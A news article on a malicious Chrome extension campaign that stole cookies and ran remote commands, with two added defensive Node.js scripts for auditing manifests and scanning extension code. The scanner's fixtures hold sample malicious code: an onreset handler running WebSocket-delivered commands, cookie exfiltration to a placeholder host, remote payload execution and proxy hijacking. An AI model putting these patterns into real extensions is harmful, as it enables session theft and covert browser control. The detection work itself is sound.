A threat actor has been running an ongoing campaign involving malicious Chrome browser extensions, first detected in February 2024. The extensions, while appearing to be useful productivity tools or legitimate services, are in fact tools for cyber espionage, data exfiltration, and browser hijacking.
According to a new report by the DomainTools Intelligence (DTI) team, the malicious extensions were distributed via convincing websites that impersonate a wide range of services, including VPNs, crypto platforms, ad creation tools, and banking utilities. The threat actors created and operated more than 100 fake websites to funnel users into installing these extensions from the official Chrome Web Store.
“The extensions typically have a dual functionality, in which they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code,” the researchers noted.
One notable aspect of the campaign is the set of permissions the extensions request in their manifest.json file, which the user grants at install time. Broad host permissions let them interact with every webpage a user visits, load and execute arbitrary code from attacker-controlled servers, and inject ads or redirect traffic at will.
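As an added illustration (editor-written, not code from the DomainTools report or from the extensions themselves), the following Node.js script audits an extension's manifest.json for the kind of broad grants the paragraph describes: host patterns that cover every site, content scripts declared for every origin, sensitive API permissions, and a loosened extension CSP. Both manifests in the block are constructed samples; the permission names are real Chrome manifest keys.

```javascript
// Added example: audit a Chrome extension manifest for broad grants.
// Editor-written illustration; the two manifests below are constructed samples.

// Match patterns that cover every site the user visits.
const BROAD_HOST_PATTERNS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

// API permissions that map to the capabilities described in the article:
// reading cookies, injecting scripts, rewriting or proxying traffic.
const SENSITIVE_PERMISSIONS = {
  cookies: 'read and modify cookies (session theft)',
  scripting: 'inject scripts into open pages',
  webRequest: 'observe or modify network requests',
  webRequestBlocking: 'block or rewrite network requests',
  declarativeNetRequest: 'rewrite or redirect traffic',
  proxy: 'route browser traffic through a chosen proxy',
  tabs: 'enumerate and control open tabs',
  webNavigation: 'track every navigation',
};

function isBroadHost(pattern) {
  return BROAD_HOST_PATTERNS.includes(String(pattern).trim());
}

// Returns { severity, where, detail } findings for one parsed manifest object.
function auditManifest(manifest) {
  const findings = [];
  const permissions = manifest.permissions || [];

  // MV3 keeps host patterns in host_permissions; MV2 mixed them into permissions.
  const hostPatterns = [
    ...(manifest.host_permissions || []),
    ...permissions.filter((p) => p === '<all_urls>' || p.includes('://')),
  ];
  for (const h of hostPatterns) {
    if (isBroadHost(h)) {
      findings.push({ severity: 'high', where: 'host_permissions', detail: `broad host match ${h}` });
    }
  }

  for (const p of permissions) {
    if (SENSITIVE_PERMISSIONS[p]) {
      findings.push({ severity: 'medium', where: 'permissions', detail: `${p}: ${SENSITIVE_PERMISSIONS[p]}` });
    }
  }

  // Content scripts declared for every origin run on each page the user opens.
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      if (isBroadHost(m)) {
        const js = (cs.js || []).join(', ') || '(no js listed)';
        findings.push({ severity: 'high', where: 'content_scripts.matches', detail: `${js} runs on ${m}` });
      }
    }
  }

  // A manifest that loosens the extension's own CSP deserves a look as well.
  const csp = manifest.content_security_policy;
  const cspText = typeof csp === 'string' ? csp : csp ? Object.values(csp).join('; ') : '';
  if (/unsafe-eval|unsafe-inline|https?:\/\//.test(cspText)) {
    findings.push({ severity: 'high', where: 'content_security_policy', detail: `relaxed CSP: ${cspText}` });
  }
  return findings;
}

function summarize(findings) {
  const counts = { high: 0, medium: 0, total: findings.length };
  for (const f of findings) counts[f.severity] += 1;
  return counts;
}

// Constructed sample: a "VPN helper" that asks for everything.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Example VPN Helper',
  version: '1.0.3',
  permissions: ['cookies', 'scripting', 'storage', 'tabs', 'webRequest', 'proxy'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['*://*/*'], js: ['content.js'], run_at: 'document_start' }],
  background: { service_worker: 'background.js' },
};

// Constructed sample: a narrowly scoped extension for comparison.
const BENIGN_MANIFEST = {
  manifest_version: 3,
  name: 'Example Word Counter',
  version: '0.1.0',
  permissions: ['activeTab'],
  action: { default_popup: 'popup.html' },
};

for (const [label, m] of [['sample', SAMPLE_MANIFEST], ['benign', BENIGN_MANIFEST]]) {
  const findings = auditManifest(m);
  console.log(label, summarize(findings));
  for (const f of findings) console.log(`  [${f.severity}] ${f.where}: ${f.detail}`);
}
```

Run it against a manifest pulled from an installed extension's directory (or the unpacked CRX) to get a quick first-pass triage; a "high" on host permissions together with cookies, webRequest or proxy is the combination worth escalating, since it is exactly what lets an extension read every page, take session cookies and reroute traffic.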
Additionally, the extensions were found to execute scripts through a lesser-known mechanism: a handler for the onreset event attached to a temporary DOM element. The researchers suggest this may be intended to circumvent browser-enforced Content Security Policy (CSP) protections, enabling the covert execution of harmful commands. One caveat: inline event-handler attributes fall under the same script-src rules as inline script blocks, so a page policy that omits 'unsafe-inline' blocks them too; the trick is not a general CSP bypass, and its main value is running a received string as code without an explicit eval call.
Several of the campaign’s lure websites spoofed well-known services such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats. Once installed, the malicious code harvested browser session cookies, established persistent WebSocket connections for command-and-control (C2) communication, and even turned browsers into proxy nodes for redirecting traffic.
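The two preceding paragraphs describe the behaviours a reviewer should look for in an extension's JavaScript: the onreset handler trick, WebSocket C2 channels, cookie harvesting, remote code loading and proxy reconfiguration. As an added example (editor-written; not code from the DomainTools report or the extensions), the following Node.js script runs a static triage pass with one rule per behaviour over constructed sample files. The sample content script shows one plausible shape of the onreset pattern, reconstructed from the article's description, not code recovered from the campaign; the hostnames use the reserved .invalid domain.

```javascript
// Added example: static triage of extension JavaScript for the behaviours
// described in the article. Editor-written; rules and sample files are constructed.

const RULES = [
  // A code string placed in an inline event-handler attribute on a throwaway
  // element and triggered with a synthetic event: the onreset pattern.
  { id: 'inline-handler-exec', sev: 'high', re: /setAttribute\(\s*['"]on\w+['"]/,
    why: 'code string set as an inline event-handler attribute' },
  { id: 'synthetic-event', sev: 'low', re: /dispatchEvent\(\s*new\s+(Event|CustomEvent)\(/,
    why: 'synthetic event dispatched (pairs with inline-handler-exec)' },
  { id: 'dynamic-eval', sev: 'high', re: /\beval\(|new\s+Function\(/,
    why: 'eval or Function constructor on a runtime string' },
  { id: 'websocket', sev: 'medium', re: /new\s+WebSocket\(/,
    why: 'persistent WebSocket channel (possible C2)' },
  { id: 'remote-fetch', sev: 'medium', re: /(fetch|importScripts)\(\s*['"`]https?:\/\//,
    why: 'request to a hard-coded remote host (code download or exfiltration)' },
  { id: 'cookie-harvest', sev: 'high', re: /chrome\.cookies\.getAll\(/,
    why: 'bulk read of browser cookies' },
  { id: 'proxy-config', sev: 'high', re: /chrome\.proxy\.settings\.set\(/,
    why: 'rewrites the browser proxy configuration' },
];

// Scan one file; returns one { file, line, id, sev, why, snippet } per rule hit.
function scanSource(file, src) {
  const hits = [];
  src.split('\n').forEach((text, i) => {
    for (const r of RULES) {
      if (r.re.test(text)) {
        hits.push({ file, line: i + 1, id: r.id, sev: r.sev, why: r.why, snippet: text.trim() });
      }
    }
  });
  return hits;
}

// Combine per-file hits into the composite behaviours worth escalating.
function triage(files) {
  const findings = Object.entries(files).flatMap(([name, src]) => scanSource(name, src));
  const ids = new Set(findings.map((f) => f.id));
  const has = (...xs) => xs.some((x) => ids.has(x));
  const composite = [];
  if (has('inline-handler-exec', 'dynamic-eval') && has('websocket', 'remote-fetch')) {
    composite.push('remote-command-execution'); // runs whatever a remote host sends
  }
  if (has('cookie-harvest') && has('websocket', 'remote-fetch')) composite.push('session-theft');
  if (has('proxy-config')) composite.push('traffic-proxying');
  return { findings, composite, verdict: composite.length ? 'suspicious' : 'no indicators' };
}

// Constructed sample content script: one plausible shape of the onreset trick
// plus a WebSocket command channel. Not code recovered from the campaign.
const SAMPLE_CONTENT_JS = `
function runRemote(code) {
  const el = document.createElement('div');
  el.setAttribute('onreset', code);
  el.dispatchEvent(new Event('reset'));
  el.remove();
}
const ws = new WebSocket('wss://c2.example.invalid/ws');
ws.onmessage = (e) => runRemote(e.data);
`;

// Constructed sample background script: cookie exfiltration, remote payload,
// proxy reconfiguration.
const SAMPLE_BACKGROUND_JS = `
chrome.cookies.getAll({}, (cookies) => {
  fetch('https://collect.example.invalid/c', { method: 'POST', body: JSON.stringify(cookies) });
});
fetch('https://cdn.example.invalid/p.js').then((r) => r.text()).then((s) => new Function(s)());
chrome.proxy.settings.set({ value: { mode: 'fixed_servers', rules: { singleProxy: { host: '198.51.100.7', port: 8080 } } } });
`;

// Constructed benign content script for comparison.
const BENIGN_JS = `
document.addEventListener('DOMContentLoaded', () => {
  chrome.runtime.sendMessage({ words: document.body.innerText.split(/\\s+/).length });
});
`;

const report = triage({ 'content.js': SAMPLE_CONTENT_JS, 'background.js': SAMPLE_BACKGROUND_JS });
console.log(report.verdict, report.composite);
for (const f of report.findings) console.log(`  ${f.file}:${f.line} [${f.sev}] ${f.id}: ${f.snippet}`);
```

Regex rules of this kind are a triage aid, not a verdict: minified or string-obfuscated code will evade them, and a legitimate extension may use WebSockets or fetch. The point of the composite step is that the combination of a string-to-code primitive with a live remote channel, or of a bulk cookie read with an outbound request, is what distinguishes the behaviour described in the article from ordinary extension code.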
While the exact method of initial victim targeting remains unclear, DomainTools believes phishing emails and social media channels may be involved.
“Many lure sites contained Facebook tracking IDs,” the researchers said, “suggesting the campaign may be leveraging Facebook pages, groups, or advertisements to drive traffic.”
Because the fake extensions were hosted on the Chrome Web Store and backed by professional-looking websites, they surfaced in both ordinary web searches and Chrome Web Store queries, which lent them an added appearance of legitimacy. Google has since removed the malicious extensions from the Chrome Web Store.